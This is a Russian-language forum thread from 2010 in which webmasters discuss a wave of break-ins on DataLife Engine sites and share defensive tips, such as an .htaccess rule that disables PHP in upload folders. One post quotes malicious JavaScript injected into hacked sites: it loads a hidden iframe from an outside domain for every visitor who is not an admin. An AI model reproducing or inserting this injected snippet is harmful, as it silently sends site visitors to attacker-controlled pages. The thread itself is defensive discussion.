Информация Массовый взлом сайтов на DLE

toxass · 22 Сен 2010

Поменял все. На 9й версии (от нуллед Мид-тим) взломали еще раз.

Zveros · 22 Сен 2010

Тоже нашел эту гадость у себя. А как лечиться если даже на 9 ломают?

antiterror · 22 Сен 2010

Zveros написал(а):
Тоже нашел эту гадость у себя. А как лечиться если даже на 9 ломают?

Защитить upload папку от запуска всех файлов кроме как изображений и фоток! Советую, меня за эти 6 лет не разу не ломали через shell.

E-body · 22 Сен 2010

antiterror написал(а):
Защитить upload папку от запуска всех файлов кроме как изображений и фоток! Советую, меня за эти 6 лет не разу не ломали через shell.

Во все каталоги, доступные для записи, закачиваем (или добавляем строчки к существующему) .htaccess с содержимым:

PHP:

php_flag engine 0
AddType "text/html" .php .cgi .pl .fcgi .fpl .phtml .shtml .php2 .php3 .php4 .php5 .asp

отключаем PHP в данном каталоге и заставляем все скрипты отображаться как HTML.
источник: хабрахабр

Demon425 · 22 Сен 2010

По ходу это эта уязвимость:

Для просмотра ссылки Войди или Зарегистрируйся

Только если ломают 9.0 ... странно как-то

+VAMPIR+ · 23 Сен 2010

Demon425 написал(а):
По ходу это эта уязвимость:
Для просмотра ссылки Войди или Зарегистрируйся
Только если ломают 9.0 ... странно как-то

мля

ты не угадал , это вот закреплена специально в Важно: Для просмотра ссылки Войди или Зарегистрируйся

а источник вот: Для просмотра ссылки Войди или Зарегистрируйся

Demon425 · 23 Сен 2010

В таком случае она критическая, и сопоставима с той, которая позволяла в 8.2 получать пароль в 1 клик.

Просто поражаюсь, как целсофт выпускает продукт, гребёт такие бабки, а баги лопатой гребсти. Только вот сколько мы, простые смертные еще не знам дырок, вопрос открыт.

antiterror · 23 Сен 2010

вот выложу вам способ на +60% надёжный))

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

AllForSmart · 26 Сен 2010

absolutNICK написал(а):
Кстати, если хотите быстро проверить взломан ли ваш дле-шный сайт, проверьте rss. Если rss выдаёт ошибку - то 95% что у вас стоит тот самый шел.

А что пишет?
А то у меня не работает RSS, но шелла и взлома вроде не было

Demon425 · 26 Сен 2010

"Не ждали? а мы пришли". Опять наблюдается массовый взлом...

Вот такая хрень содержится в *.js который подгружается с сайтов yourpic.msk.ru и tvoyatajna.msk.ru

Код:

if ( dle_admin == "" ) {
document.write("<iframe src=\"http://yourpic.msk.ru/\" width=\"226\" height=\"237\" scrolling=\"no\" style=\"display: none;\"></iframe><!--<script language=\"JavaScript\" charset=\"windows-1251\" src=\"http://pop-media.ru/bdclc.ff5f23ad6734828ef49c20fdda2114ef.107.ce4b7548baff97c6a99f543838a4bfb2\"></script>-->");
}

Что самое интерресное, js подключается с новостей.

Информация Массовый взлом сайтов на DLE

toxass

Постоялец

Zveros

Постоялец

antiterror

xProgramming

E-body

Мой дом здесь!

Demon425

Постоялец

+VAMPIR+

Master

Demon425

Постоялец

antiterror

xProgramming

AllForSmart

Постоялец

Demon425

Постоялец